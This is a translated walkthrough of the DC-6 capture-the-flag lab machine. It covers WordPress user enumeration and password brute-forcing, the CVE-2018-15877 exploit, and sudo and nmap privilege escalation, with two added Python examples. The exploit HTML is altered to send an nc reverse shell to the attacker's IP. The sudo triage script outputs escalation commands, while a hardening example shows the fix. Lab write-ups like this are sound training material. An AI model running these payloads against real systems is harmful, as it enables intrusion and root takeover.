DC-6 Target Machine Penetration Test
Environment:
- VMware Pro 16
- Kali 2021.1 (virtual machine)
- DC-6 (virtual machine)
I. Information Gathering
1. Host discovery
arp-scan -l
2. Port scan
nmap -A -p- 192.168.2.170
Open ports found:
22: SSH
80: HTTP, running WordPress
The site uses the hostname wordy, which maps to 192.168.2.170
II. Vulnerability Scanning
1. Visit the web service
Browsing to the IP redirects to the hostname wordy, which does not resolve
Add a mapping to /etc/hosts (as root, or prefix the command with sudo):
echo '192.168.2.170 wordy' >> /etc/hosts
Reload the site; the homepage now appears. Inspect the page
2. Enumerate usernames with WPScan
wpscan --url http://wordy -e u
3. Brute-force the users' passwords
Following the hint from the DC-6 author, go to the wordlist directory and build the password list from rockyou, keeping only entries that contain "k01":
cd /usr/share/wordlists
gunzip rockyou.txt.gz
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
Run the brute force (with no -U list given, WPScan enumerates the users itself before trying the passwords):
wpscan --url http://wordy -P ./passwords.txt
Result: one valid credential pair, Username: mark, Password: helpdesk01
4. Directory scan to find the admin panel
nikto -h 192.168.2.170
The admin login page is found (WordPress's /wp-admin)
5. Log in to the admin panel as mark and collect information
The Plainview Activity Monitor plugin is installed; search Kali's exploit database for it
6. Exploit search
searchsploit activity monitor
A matching exploit is listed; print it with cat to read the details
cd /usr/share/exploitdb/exploits/php/webapps
cat ./45274.html
45274.html
<!--
About:
===========
Component: Plainview Activity Monitor (Wordpress plugin)
Vulnerable version: 20161228 and possibly prior
Fixed version: 20180826
CVE-ID: CVE-2018-15877
CWE-ID: CWE-78
Author:
- Lydéric Lefebvre (https://www.linkedin.com/in/lydericlefebvre)

Timeline:
===========
- 2018/08/25: Vulnerability found
- 2018/08/25: CVE-ID request
- 2018/08/26: Reported to developer
- 2018/08/26: Fixed version
- 2018/08/26: Advisory published on GitHub
- 2018/08/26: Advisory sent to bugtraq mailing list

Description:
===========
Plainview Activity Monitor Wordpress plugin is vulnerable to OS
command injection which allows an attacker to remotely execute
commands on underlying system. Application passes unsafe user supplied
data to ip parameter into activities_overview.php.
Privileges are required in order to exploit this vulnerability, but
this plugin version is also vulnerable to CSRF attack and Reflected
XSS. Combined, these three vulnerabilities can lead to Remote Command
Execution just with an admin click on a malicious link.

References:
===========
https://github.com/aas-n/CVE/blob/master/CVE-2018-15877/

PoC:
-->

<html>
  <!--
  Wordpress Plainview Activity Monitor RCE
  [+] Version: 20161228 and possibly prior
  [+] Description: Combine OS Commanding and CSRF to get reverse shell
  [+] Author: Lydéric LEFEBVRE
  [+] CVE-ID: CVE-2018-15877
  [+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell
  [+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well
  -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" />
      <input type="hidden" name="lookup" value="Lookup" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
The PoC is a CSRF page that auto-submits the plugin's Lookup form with an OS command injection payload in the ip field. The injection (CWE-78) is the actual bug; CSRF is only the delivery vector that lets an attacker ride an admin's session. Since we are already logged in as the administrator mark, the form alone is enough. Extract it and change two things:
the target host (localhost:8000 becomes wordy) and the nc command: the PoC's listener-style nc -nlvp 127.0.0.1 9999 -e /bin/bash is replaced by a reverse shell back to the attacker machine, nc 192.168.2.154 9999 -e /bin/bash
<html>
  <!--
  Wordpress Plainview Activity Monitor RCE
  [+] Version: 20161228 and possibly prior
  [+] Description: Combine OS Commanding and CSRF to get reverse shell
  [+] Author: Lydéric LEFEBVRE
  [+] CVE-ID: CVE-2018-15877
  [+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell
  [+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well
  -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="ip" value="google.fr| nc 192.168.2.154 9999 -e /bin/bash" />
      <input type="hidden" name="lookup" value="Lookup" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
Save it as 1.html on the desktop
7. Catch the shell with nc
Start a listener on the attacker machine:
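The root cause the advisory describes (the ip field is glued into a shell command string) is easy to see in miniature. The following is an added example and not the plugin's code: the advisory only says that activities_overview.php passes the ip parameter unsafely into a command, so the vulnerable builder below is an assumed model of that pattern, with the real lookup tool replaced by echo (LOOKUP_TOOL) so it runs offline, and the nc callback from 1.html replaced by id (PAYLOAD) so the demo is harmless. The hardened version validates the value against an allow-list (an IP address or an RFC 1123 hostname) and passes it as a separate argv element with no shell at all:

```python
"""CVE-2018-15877 root cause in miniature: shell string concatenation
versus an allow-listed value passed as argv. Added example, not the
plugin's code; the vulnerable builder is an assumed model of what the
advisory describes."""
import ipaddress
import re
import subprocess
from typing import List

# Stand-in for the plugin's DNS lookup tool (assumption: something like
# dig/host); echo keeps the demo offline and side-effect free.
LOOKUP_TOOL = "echo"

# Constructed payload: the shape 1.html submits in the hidden "ip" field,
# with the nc reverse shell swapped for a harmless `id`.
PAYLOAD = "google.fr| id"


def build_vulnerable_command(ip: str) -> str:
    """Concatenate the untrusted value into one string, as shell_exec() would
    receive it. The shell will re-parse '|' as a pipe, not as data."""
    return f"{LOOKUP_TOOL} {ip}"


def run_vulnerable(ip: str) -> str:
    """Execute via /bin/sh -c, the equivalent of PHP's shell_exec()."""
    proc = subprocess.run(["sh", "-c", build_vulnerable_command(ip)],
                          capture_output=True, text=True)
    return proc.stdout


# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# no leading/trailing hyphen, 63 chars per label, 253 total.
_HOSTNAME = re.compile(
    r"^(?=.{1,253}$)"
    r"(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$",
    re.IGNORECASE,
)


def is_valid_lookup_target(value: str) -> bool:
    """Allow-list check: an IP address or a hostname, nothing else."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    return bool(_HOSTNAME.match(value))


def build_safe_command(ip: str) -> List[str]:
    """Argv list, no shell: even if validation were bypassed, '|' and ';'
    would reach the lookup tool as literal bytes of a single argument."""
    if not is_valid_lookup_target(ip):
        raise ValueError(f"rejected lookup target: {ip!r}")
    return [LOOKUP_TOOL, ip]


def safe_lookup_rejects(value: str) -> bool:
    """True when the hardened builder refuses the value."""
    try:
        build_safe_command(value)
    except ValueError:
        return True
    return False


def run_safe(ip: str) -> str:
    """Execute the argv list directly (no shell involved)."""
    proc = subprocess.run(build_safe_command(ip),
                          capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    print("vulnerable:", build_vulnerable_command(PAYLOAD))
    print(run_vulnerable(PAYLOAD).strip())          # shows uid=...: `id` ran
    print("safe rejects payload:", safe_lookup_rejects(PAYLOAD))
    print("safe lookup:", run_safe("google.fr").strip())
```

Note that validation alone is not the fix: the argv form is what removes the shell from the path, and the allow-list is defence in depth for the day the lookup tool itself grows an option-parsing surprise.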
nc -lvvp 9999
Open 1.html in the browser that holds the admin session and submit the form (alternatively, intercept the plugin's Lookup request in Burp Suite and put the payload into the ip parameter there)
The listener receives a shell on the target
8. Information gathering on the target
In mark's home directory there is a note about adding a user that contains a plaintext password; since SSH (port 22) is open on the target, try logging in with it
9. SSH login
ssh graham@192.168.2.170
yes            (accept the host key fingerprint)
GSo7isUM1D4    (graham's password from the note)
III. Privilege Escalation
1. Try sudo escalation
sudo -l
graham may run /home/jens/backups.sh as user jens
Since the script is writable by graham, replace its contents with /bin/bash
echo '/bin/bash' > /home/jens/backups.sh
cat /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh
After running this the shell belongs to jens; check what jens can do
jens has no useful privileges of its own, so check sudo again
sudo -l
jens may run nmap as root without a password
nmap executes NSE (Lua) scripts, so a script that spawns a shell runs as root
cd /tmp
echo 'os.execute("/bin/bash")'>shell
sudo nmap --script=shell
The shell nmap spawns is not a proper interactive tty (typed input is not echoed); check whether python is available and use it to spawn a pty
python -V
python -c "import pty;pty.spawn('/bin/bash')"
cd /root
cat theflag.txt
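Both escalation steps above came from reading sudo -l by hand. The following added example (not tooling from the page) automates that reading: it parses the "(runas) NOPASSWD: command" lines sudo prints, and flags a script that runs as another user and is writable by us (the backups.sh case) and a binary whose script feature yields a shell (the nmap case). The two sudo -l samples are constructed to match what the page reports for graham and jens; their exact wording is an assumption, only the rules come from the page. Writability is passed in as a callable so the check runs offline; on a real target the default uses os.access:

```python
"""Triage of `sudo -l` output for the escalation paths used on DC-6.
Added example; the sample sudo output below is constructed."""
import os
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple

# Constructed sample: graham's sudo -l (formatting assumed, rule from the page).
SUDO_L_GRAHAM = """\
Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh
"""

# Constructed sample: jens's sudo -l (formatting assumed, rule from the page).
SUDO_L_JENS = """\
User jens may run the following commands on dc-6:
    (root) NOPASSWD: /usr/bin/nmap
"""

# Binaries whose sudo entry gives a shell through a script feature.
# Only nmap is listed because that is the path the page uses.
SCRIPT_RUNNERS = {
    "nmap": "echo 'os.execute(\"/bin/bash\")' > /tmp/shell; "
            "sudo -u {runas} nmap --script=/tmp/shell",
}

# One sudoers rule line: "(runas[ : group]) [NOPASSWD:] cmd[, cmd...]"
_RULE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<nopasswd>NOPASSWD:)?\s*(?P<cmds>\S.*?)\s*$"
)


@dataclass
class Finding:
    runas: str
    command: str
    nopasswd: bool
    technique: str


def parse_sudo_rules(text: str) -> List[Tuple[str, bool, str]]:
    """Return (runas_user, nopasswd, command) for every rule line."""
    rules = []
    for line in text.splitlines():
        m = _RULE.match(line)
        if not m:
            continue                      # Defaults / header lines
        runas = m.group("runas").split(":")[0].strip()   # drop ": group"
        nopasswd = m.group("nopasswd") is not None
        for cmd in m.group("cmds").split(","):
            rules.append((runas, nopasswd, cmd.strip()))
    return rules


def writable_here(path: str) -> bool:
    """Default writability check against the local filesystem."""
    return os.access(path, os.W_OK)


def triage_sudo_rules(text: str,
                      is_writable: Callable[[str], bool] = writable_here
                      ) -> List[Finding]:
    """Map each rule to the escalation it enables, if any."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_rules(text):
        if cmd == "ALL":
            target = "root" if runas in ("ALL", "root") else runas
            findings.append(Finding(runas, cmd, nopasswd,
                                    f"any command allowed: sudo -u {target} /bin/bash"))
            continue
        path = cmd.split()[0]
        name = os.path.basename(path)
        if name in SCRIPT_RUNNERS:
            findings.append(Finding(runas, cmd, nopasswd,
                                    SCRIPT_RUNNERS[name].format(runas=runas)))
        elif is_writable(path):
            findings.append(Finding(runas, cmd, nopasswd,
                                    f"echo '/bin/bash' > {path}; sudo -u {runas} {path}"))
    return findings


if __name__ == "__main__":
    for f in triage_sudo_rules(SUDO_L_GRAHAM, lambda p: p == "/home/jens/backups.sh"):
        print(f)
    for f in triage_sudo_rules(SUDO_L_JENS):
        print(f)
```

The writable-script check is the one that needs care in practice: sudo resolves the rule by path, so the file must be writable by the calling user (or sit in a directory the user can replace it in) for the overwrite to work, which is why the check is on the path rather than on the rule text.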
Summary